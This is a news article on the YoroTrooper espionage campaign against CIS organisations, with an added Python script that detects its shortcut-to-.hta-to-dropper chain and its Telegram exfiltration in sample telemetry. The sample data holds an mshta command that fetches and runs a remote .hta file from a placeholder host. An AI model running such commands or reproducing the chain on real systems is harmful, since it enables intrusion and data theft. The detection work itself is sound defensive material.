YoroTrooper hackers attack the CIS: criminals are interested in credentials and other confidential information
Dozens of organizations in Belarus, Azerbaijan, Tajikistan, Turkmenistan and Kyrgyzstan were hit.
A previously undocumented hacker group tracked as YoroTrooper has targeted government, energy and other critical organizations across Europe in a cyber-espionage campaign that has been running since at least June 2022.
“Information stolen in successful compromises includes credentials from multiple applications, browser history, cookies, system information, and screenshots,” declared Cisco Talos researchers.
Known target countries include Belarus, Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan and other CIS countries. According to the researchers, Turkish government agencies were also hit.
Experts believe a Russian-speaking attacker is behind the campaign, based on victimology patterns and Cyrillic fragments found in some of the implants. YoroTrooper's intrusion toolset also shows tactical overlap with the PoetRAT team, which was documented in 2020 using coronavirus-themed decoys against government and energy organizations in Azerbaijan. Cisco Talos researchers were unable to determine PoetRAT's country of origin during that earlier investigation.
YoroTrooper achieves its data-collection goals by combining commodity malware (Ave Maria, LodaRAT, Meterpreter and Stink) with infection chains built on malicious shortcuts (.lnk) and decoy documents, wrapped in .zip or .rar archives and distributed through spear phishing.
YoroTrooper infection chain
The malicious shortcuts act as simple downloaders that execute an .hta file fetched from a remote server. When that file runs, the victim sees an ordinary-looking .pdf document while a dropper launches in the background to deliver the information stealer. The attackers use Telegram as the channel for exfiltrating the stolen data.
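The chain just described (shortcut launches a script host with a remote .hta, the script host drops an executable into a user-writable directory, and that executable talks to the Telegram API) leaves a recognizable trail in endpoint telemetry. The following is an added example of detection logic written for this article; it is not code from Cisco Talos or from the report. The event records are constructed to loosely resemble Sysmon process-create and network-connect events, but the field names (`image`, `parent_image`, `cmdline`, `dest_host`) are assumptions for the example, not a vendor schema, and the hostnames and paths are made up.

```python
"""Added example: flagging a YoroTrooper-style infection chain in endpoint telemetry."""
import ntpath
import re

# Constructed sample telemetry (not real logs). event 1 = process create,
# event 3 = network connect; field names are an assumption for this example.
SAMPLE_EVENTS = [
    {"event": 1, "pid": 4120, "ppid": 1892,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe http://files.example.invalid/contract.hta"},
    {"event": 1, "pid": 5004, "ppid": 4120,
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"event": 3, "pid": 5004,
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    # Benign noise: a browser started by the user that also reaches the Telegram API.
    {"event": 1, "pid": 6100, "ppid": 1892,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"chrome.exe https://example.invalid/"},
    {"event": 3, "pid": 6100,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Directories an ordinary user can write to; a dropper lands here, not in System32.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
# Image names expected to contact the Telegram API. Name-based allowlisting is
# weak on its own (a binary can be renamed), which is why correlate() below
# also requires the process to descend from a flagged script host.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows path, portable across host OSes."""
    return ntpath.basename(path).lower()


def detect(events):
    """Apply three single-event rules; return one alert dict per hit."""
    alerts = []
    for e in events:
        img = basename(e["image"])
        if e["event"] == 1:
            # Rule 1: a script host told to run content straight from a URL (.hta stage).
            if img in SCRIPT_HOSTS and REMOTE_URL.search(e["cmdline"]):
                alerts.append({"rule": "script_host_remote_url", "pid": e["pid"]})
            # Rule 2: a script host spawning an executable from a user-writable path (dropper stage).
            if basename(e["parent_image"]) in SCRIPT_HOSTS and USER_WRITABLE.search(e["image"]):
                alerts.append({"rule": "script_host_drops_payload", "pid": e["pid"]})
        elif e["event"] == 3:
            # Rule 3: Telegram API reached by something that is not a messenger or browser (exfil stage).
            if e["dest_host"].lower() == "api.telegram.org" and img not in BROWSERS:
                alerts.append({"rule": "telegram_api_from_unexpected_process", "pid": e["pid"]})
    return alerts


def correlate(events, alerts, max_depth=16):
    """Tie the exfil alert back to the script-host stage by walking the parent chain.

    Returns one record per process that contacted Telegram and has an ancestor
    (within max_depth hops) that was flagged for running a remote script.
    """
    parent = {e["pid"]: e["ppid"] for e in events if e["event"] == 1}
    rules_by_pid = {}
    for a in alerts:
        rules_by_pid.setdefault(a["pid"], set()).add(a["rule"])
    chains = []
    for pid, rules in rules_by_pid.items():
        if "telegram_api_from_unexpected_process" not in rules:
            continue
        cur = pid
        for _ in range(max_depth):
            if cur not in parent:
                break
            cur = parent[cur]
            if "script_host_remote_url" in rules_by_pid.get(cur, set()):
                chains.append({"pid": pid, "origin_pid": cur})
                break
    return chains


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['rule']:40s} pid={a['pid']}")
    for c in correlate(SAMPLE_EVENTS, found):
        print(f"full chain: pid {c['pid']} descends from flagged script host pid {c['origin_pid']}")
```

Each rule fires on its own stage of the chain, and `correlate()` only reports a full chain when the process reaching the Telegram API descends from the process that ran the remote .hta, which keeps a user's browser visiting Telegram out of the high-severity result even if the name-based allowlist is bypassed. In a real deployment the same logic would read the telemetry stream rather than the constructed list above.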
The attackers' use of LodaRAT is noteworthy: it shows that this malware is used by several different groups, even though it is attributed to the Kasablanka group. Kasablanka has also been seen distributing Ave Maria in recent malware campaigns targeting Russia.
Other auxiliary tools deployed by YoroTrooper include reverse shells and a custom keylogger written in C, which records keystrokes and saves them to a file on disk.
“It is worth noting that while this campaign began with the distribution of common malware such as Ave Maria and LodaRAT, it has expanded significantly to include Python-based malware. This highlights the increased efforts being made by attackers,” the Cisco Talos researchers concluded.